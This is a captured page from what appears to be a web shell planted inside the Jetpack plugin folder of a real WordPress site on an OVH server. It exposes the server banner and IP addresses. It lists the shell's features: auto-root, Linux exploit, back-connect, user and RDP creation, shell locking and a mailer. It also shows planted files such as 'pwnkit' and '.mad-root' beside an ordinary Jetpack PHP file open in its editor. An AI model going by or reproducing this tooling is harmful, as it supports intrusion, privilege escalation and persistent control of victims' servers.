Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
jetpack /
_inc /
[ HOME SHELL ]
Name
Size
Permission
Action
blocks
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
genericons
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
accessible-focus.js
620
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
blogging-prompts.php
9.06
KB
-rw-r--r--
class.jetpack-provision.php
9.56
KB
-rw-r--r--
crowdsignal-shortcode.js
649
B
-rw-r--r--
crowdsignal-survey.js
277
B
-rw-r--r--
deprecate.js
2.26
KB
-rw-r--r--
facebook-embed.js
1
KB
-rw-r--r--
gallery-settings.js
1
KB
-rw-r--r--
genericons.php
508
B
-rw-r--r--
jetpack-admin.js
1.56
KB
-rw-r--r--
jetpack-deactivate-dialog.js
2.9
KB
-rw-r--r--
jetpack-modules.js
2.37
KB
-rw-r--r--
jetpack-modules.models.js
2.15
KB
-rw-r--r--
jetpack-modules.views.js
1.69
KB
-rw-r--r--
polldaddy-shortcode.js
2.64
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
site-switcher-endpoint.php
2.33
KB
-rw-r--r--
site-switcher.js
7.61
KB
-rw-r--r--
site-switcher.php
1.9
KB
-rw-r--r--
social-logos.php
840
B
-rw-r--r--
twitter-timeline.js
351
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : site-switcher.php
<?php /** * Site Switcher for Command Palette * Enqueues the site switcher UI and loads the compact sites list endpoint * * @package automattic/jetpack */ use Automattic\Jetpack\Connection\Manager as Connection_Manager; if ( ! defined( 'ABSPATH' ) ) { exit( 0 ); } // Load the Jetpack endpoint (not needed on WordPress.com simple sites) if ( ! ( defined( 'IS_WPCOM' ) && IS_WPCOM ) ) { require_once __DIR__ . '/site-switcher-endpoint.php'; } /** * Enqueue site switcher scripts in all wp-admin pages. */ function jetpack_site_switcher_enqueue_scripts() { // Only enqueue for users connected to WordPress.com (unless on WPCOM where all users are connected) if ( ! ( defined( 'IS_WPCOM' ) && IS_WPCOM ) ) { $connection_manager = new Connection_Manager(); if ( ! $connection_manager->is_user_connected() ) { return; } } // Load asset file for dependencies and version $asset_file = JETPACK__PLUGIN_DIR . '_inc/build/site-switcher.min.asset.php'; $asset = file_exists( $asset_file ) ? require $asset_file : array( 'dependencies' => array( 'wp-api-fetch', 'wp-commands', 'wp-element', 'wp-i18n', 'wp-icons' ), 'version' => JETPACK__VERSION, ); // Register and enqueue site switcher JavaScript wp_enqueue_script( 'jetpack-site-switcher', plugins_url( '_inc/build/site-switcher.min.js', JETPACK__PLUGIN_FILE ), $asset['dependencies'], $asset['version'], true ); // Pass configuration to JavaScript $api_path = ( defined( 'IS_WPCOM' ) && IS_WPCOM ) ? '/rest/v1.1/me/sites/compact' : '/jetpack/v4/sites/compact'; wp_add_inline_script( 'jetpack-site-switcher', sprintf( 'window.jetpackSiteSwitcherConfig = %s;', wp_json_encode( array( 'userId' => get_current_user_id(), 'apiPath' => $api_path, ), JSON_HEX_TAG | JSON_HEX_AMP | JSON_UNESCAPED_SLASHES ) ), 'before' ); } add_action( 'admin_enqueue_scripts', 'jetpack_site_switcher_enqueue_scripts' );
Close